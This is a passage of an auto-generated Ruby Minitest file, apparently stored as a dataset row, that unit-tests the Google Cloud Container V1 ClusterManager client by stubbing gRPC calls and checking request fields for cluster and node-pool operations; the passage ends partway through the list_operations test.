hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
6126fa9b3e69c7d33b79e0cd548933cddc705221 | 96,779 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "helper"
require "gapic/grpc/service_stub"
require "google/container/v1/cluster_service_pb"
require "google/container/v1/cluster_service_services_pb"
require "google/cloud/container/v1/cluster_manager"
class ::Google::Cloud::Container::V1::ClusterManager::ClientTest < Minitest::Test
class ClientStub
attr_accessor :call_rpc_count, :requests
def initialize response, operation, &block
@response = response
@operation = operation
@block = block
@call_rpc_count = 0
@requests = []
end
def call_rpc *args, **kwargs
@call_rpc_count += 1
@requests << @block&.call(*args, **kwargs)
yield @response, @operation if block_given?
@response
end
end
def test_list_clusters
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::ListClustersResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
parent = "hello world"
list_clusters_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_clusters, name
assert_kind_of ::Google::Cloud::Container::V1::ListClustersRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["parent"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_clusters_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_clusters({ project_id: project_id, zone: zone, parent: parent }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_clusters project_id: project_id, zone: zone, parent: parent do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_clusters ::Google::Cloud::Container::V1::ListClustersRequest.new(project_id: project_id, zone: zone, parent: parent) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_clusters({ project_id: project_id, zone: zone, parent: parent }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_clusters ::Google::Cloud::Container::V1::ListClustersRequest.new(project_id: project_id, zone: zone, parent: parent), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_clusters_client_stub.call_rpc_count
end
end
def test_get_cluster
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Cluster.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
name = "hello world"
get_cluster_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :get_cluster, name
assert_kind_of ::Google::Cloud::Container::V1::GetClusterRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, get_cluster_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.get_cluster({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.get_cluster project_id: project_id, zone: zone, cluster_id: cluster_id, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.get_cluster ::Google::Cloud::Container::V1::GetClusterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.get_cluster({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.get_cluster ::Google::Cloud::Container::V1::GetClusterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, get_cluster_client_stub.call_rpc_count
end
end
def test_create_cluster
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster = {}
parent = "hello world"
create_cluster_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :create_cluster, name
assert_kind_of ::Google::Cloud::Container::V1::CreateClusterRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::Cluster), request["cluster"]
assert_equal "hello world", request["parent"]
refute_nil options
end
Gapic::ServiceStub.stub :new, create_cluster_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.create_cluster({ project_id: project_id, zone: zone, cluster: cluster, parent: parent }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.create_cluster project_id: project_id, zone: zone, cluster: cluster, parent: parent do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.create_cluster ::Google::Cloud::Container::V1::CreateClusterRequest.new(project_id: project_id, zone: zone, cluster: cluster, parent: parent) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.create_cluster({ project_id: project_id, zone: zone, cluster: cluster, parent: parent }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.create_cluster ::Google::Cloud::Container::V1::CreateClusterRequest.new(project_id: project_id, zone: zone, cluster: cluster, parent: parent), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, create_cluster_client_stub.call_rpc_count
end
end
def test_update_cluster
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
update = {}
name = "hello world"
update_cluster_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :update_cluster, name
assert_kind_of ::Google::Cloud::Container::V1::UpdateClusterRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::ClusterUpdate), request["update"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, update_cluster_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.update_cluster({ project_id: project_id, zone: zone, cluster_id: cluster_id, update: update, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.update_cluster project_id: project_id, zone: zone, cluster_id: cluster_id, update: update, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.update_cluster ::Google::Cloud::Container::V1::UpdateClusterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, update: update, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.update_cluster({ project_id: project_id, zone: zone, cluster_id: cluster_id, update: update, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.update_cluster ::Google::Cloud::Container::V1::UpdateClusterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, update: update, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, update_cluster_client_stub.call_rpc_count
end
end
def test_update_node_pool
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
node_pool_id = "hello world"
node_version = "hello world"
image_type = "hello world"
name = "hello world"
locations = ["hello world"]
workload_metadata_config = {}
upgrade_settings = {}
update_node_pool_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :update_node_pool, name
assert_kind_of ::Google::Cloud::Container::V1::UpdateNodePoolRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["node_pool_id"]
assert_equal "hello world", request["node_version"]
assert_equal "hello world", request["image_type"]
assert_equal "hello world", request["name"]
assert_equal ["hello world"], request["locations"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::WorkloadMetadataConfig), request["workload_metadata_config"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::NodePool::UpgradeSettings), request["upgrade_settings"]
refute_nil options
end
Gapic::ServiceStub.stub :new, update_node_pool_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.update_node_pool({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_version: node_version, image_type: image_type, name: name, locations: locations, workload_metadata_config: workload_metadata_config, upgrade_settings: upgrade_settings }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.update_node_pool project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_version: node_version, image_type: image_type, name: name, locations: locations, workload_metadata_config: workload_metadata_config, upgrade_settings: upgrade_settings do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.update_node_pool ::Google::Cloud::Container::V1::UpdateNodePoolRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_version: node_version, image_type: image_type, name: name, locations: locations, workload_metadata_config: workload_metadata_config, upgrade_settings: upgrade_settings) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.update_node_pool({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_version: node_version, image_type: image_type, name: name, locations: locations, workload_metadata_config: workload_metadata_config, upgrade_settings: upgrade_settings }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.update_node_pool ::Google::Cloud::Container::V1::UpdateNodePoolRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, node_version: node_version, image_type: image_type, name: name, locations: locations, workload_metadata_config: workload_metadata_config, upgrade_settings: upgrade_settings), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, update_node_pool_client_stub.call_rpc_count
end
end
def test_set_node_pool_autoscaling
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
node_pool_id = "hello world"
autoscaling = {}
name = "hello world"
set_node_pool_autoscaling_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_node_pool_autoscaling, name
assert_kind_of ::Google::Cloud::Container::V1::SetNodePoolAutoscalingRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["node_pool_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::NodePoolAutoscaling), request["autoscaling"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_node_pool_autoscaling_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_node_pool_autoscaling({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, autoscaling: autoscaling, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_node_pool_autoscaling project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, autoscaling: autoscaling, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_node_pool_autoscaling ::Google::Cloud::Container::V1::SetNodePoolAutoscalingRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, autoscaling: autoscaling, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_node_pool_autoscaling({ project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, autoscaling: autoscaling, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_node_pool_autoscaling ::Google::Cloud::Container::V1::SetNodePoolAutoscalingRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, node_pool_id: node_pool_id, autoscaling: autoscaling, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_node_pool_autoscaling_client_stub.call_rpc_count
end
end
def test_set_logging_service
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
logging_service = "hello world"
name = "hello world"
set_logging_service_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_logging_service, name
assert_kind_of ::Google::Cloud::Container::V1::SetLoggingServiceRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["logging_service"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_logging_service_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_logging_service({ project_id: project_id, zone: zone, cluster_id: cluster_id, logging_service: logging_service, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_logging_service project_id: project_id, zone: zone, cluster_id: cluster_id, logging_service: logging_service, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_logging_service ::Google::Cloud::Container::V1::SetLoggingServiceRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, logging_service: logging_service, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_logging_service({ project_id: project_id, zone: zone, cluster_id: cluster_id, logging_service: logging_service, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_logging_service ::Google::Cloud::Container::V1::SetLoggingServiceRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, logging_service: logging_service, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_logging_service_client_stub.call_rpc_count
end
end
def test_set_monitoring_service
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
monitoring_service = "hello world"
name = "hello world"
set_monitoring_service_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_monitoring_service, name
assert_kind_of ::Google::Cloud::Container::V1::SetMonitoringServiceRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["monitoring_service"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_monitoring_service_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_monitoring_service({ project_id: project_id, zone: zone, cluster_id: cluster_id, monitoring_service: monitoring_service, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_monitoring_service project_id: project_id, zone: zone, cluster_id: cluster_id, monitoring_service: monitoring_service, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_monitoring_service ::Google::Cloud::Container::V1::SetMonitoringServiceRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, monitoring_service: monitoring_service, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_monitoring_service({ project_id: project_id, zone: zone, cluster_id: cluster_id, monitoring_service: monitoring_service, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_monitoring_service ::Google::Cloud::Container::V1::SetMonitoringServiceRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, monitoring_service: monitoring_service, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_monitoring_service_client_stub.call_rpc_count
end
end
def test_set_addons_config
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
addons_config = {}
name = "hello world"
set_addons_config_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_addons_config, name
assert_kind_of ::Google::Cloud::Container::V1::SetAddonsConfigRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::AddonsConfig), request["addons_config"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_addons_config_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_addons_config({ project_id: project_id, zone: zone, cluster_id: cluster_id, addons_config: addons_config, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_addons_config project_id: project_id, zone: zone, cluster_id: cluster_id, addons_config: addons_config, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_addons_config ::Google::Cloud::Container::V1::SetAddonsConfigRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, addons_config: addons_config, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_addons_config({ project_id: project_id, zone: zone, cluster_id: cluster_id, addons_config: addons_config, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_addons_config ::Google::Cloud::Container::V1::SetAddonsConfigRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, addons_config: addons_config, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_addons_config_client_stub.call_rpc_count
end
end
def test_set_locations
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
locations = ["hello world"]
name = "hello world"
set_locations_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_locations, name
assert_kind_of ::Google::Cloud::Container::V1::SetLocationsRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal ["hello world"], request["locations"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_locations_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_locations({ project_id: project_id, zone: zone, cluster_id: cluster_id, locations: locations, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_locations project_id: project_id, zone: zone, cluster_id: cluster_id, locations: locations, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_locations ::Google::Cloud::Container::V1::SetLocationsRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, locations: locations, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_locations({ project_id: project_id, zone: zone, cluster_id: cluster_id, locations: locations, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_locations ::Google::Cloud::Container::V1::SetLocationsRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, locations: locations, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_locations_client_stub.call_rpc_count
end
end
def test_update_master
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
master_version = "hello world"
name = "hello world"
update_master_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :update_master, name
assert_kind_of ::Google::Cloud::Container::V1::UpdateMasterRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["master_version"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, update_master_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.update_master({ project_id: project_id, zone: zone, cluster_id: cluster_id, master_version: master_version, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.update_master project_id: project_id, zone: zone, cluster_id: cluster_id, master_version: master_version, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.update_master ::Google::Cloud::Container::V1::UpdateMasterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, master_version: master_version, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.update_master({ project_id: project_id, zone: zone, cluster_id: cluster_id, master_version: master_version, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.update_master ::Google::Cloud::Container::V1::UpdateMasterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, master_version: master_version, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, update_master_client_stub.call_rpc_count
end
end
def test_set_master_auth
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
action = :UNKNOWN
update = {}
name = "hello world"
set_master_auth_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :set_master_auth, name
assert_kind_of ::Google::Cloud::Container::V1::SetMasterAuthRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal :UNKNOWN, request["action"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::Container::V1::MasterAuth), request["update"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, set_master_auth_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.set_master_auth({ project_id: project_id, zone: zone, cluster_id: cluster_id, action: action, update: update, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.set_master_auth project_id: project_id, zone: zone, cluster_id: cluster_id, action: action, update: update, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.set_master_auth ::Google::Cloud::Container::V1::SetMasterAuthRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, action: action, update: update, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.set_master_auth({ project_id: project_id, zone: zone, cluster_id: cluster_id, action: action, update: update, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.set_master_auth ::Google::Cloud::Container::V1::SetMasterAuthRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, action: action, update: update, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, set_master_auth_client_stub.call_rpc_count
end
end
def test_delete_cluster
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::Operation.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
cluster_id = "hello world"
name = "hello world"
delete_cluster_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :delete_cluster, name
assert_kind_of ::Google::Cloud::Container::V1::DeleteClusterRequest, request
assert_equal "hello world", request["project_id"]
assert_equal "hello world", request["zone"]
assert_equal "hello world", request["cluster_id"]
assert_equal "hello world", request["name"]
refute_nil options
end
Gapic::ServiceStub.stub :new, delete_cluster_client_stub do
# Create client
client = ::Google::Cloud::Container::V1::ClusterManager::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.delete_cluster({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.delete_cluster project_id: project_id, zone: zone, cluster_id: cluster_id, name: name do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.delete_cluster ::Google::Cloud::Container::V1::DeleteClusterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.delete_cluster({ project_id: project_id, zone: zone, cluster_id: cluster_id, name: name }, grpc_options) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.delete_cluster ::Google::Cloud::Container::V1::DeleteClusterRequest.new(project_id: project_id, zone: zone, cluster_id: cluster_id, name: name), grpc_options do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, delete_cluster_client_stub.call_rpc_count
end
end
def test_list_operations
# Create GRPC objects.
grpc_response = ::Google::Cloud::Container::V1::ListOperationsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
project_id = "hello world"
zone = "hello world"
parent = "hello world"
